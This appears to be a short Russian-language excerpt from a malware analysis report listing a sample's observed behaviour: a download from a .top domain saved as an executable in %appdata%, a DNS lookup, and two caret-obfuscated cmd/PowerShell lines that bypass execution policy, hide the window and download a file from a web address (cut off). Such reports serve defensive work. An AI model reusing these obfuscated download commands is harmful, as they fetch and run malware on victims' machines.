Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OweR^sh^E^LL^.E^XE -Execut^IO^n^p^o^L^iC^y bYpass ^-^N^OPro^fI^Le -W^i^n^dO^wsT^yLe^ h^id^DEN ^(NEW^-Ob^Je^CT S^YStem.^N^ET.^W^EbC^lIE^nt)^.D^OWN^LO^A^d^f^il^e^(^'http://...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^OweR^sh^E^LL^.E^XE -Execut^IO^n^p^o^L^iC^y bYpass ^-^N^OPro^fI^Le -W^i^n^dO^wsT^yLe^ h^id^DEN ^(NEW^-Ob^Je^CT S^YStem.^N^ET.^W^EbC^lIE^nt)^.D^OWN^LO^A^d^f^il^e^(^'http://...' (со скрытым окном)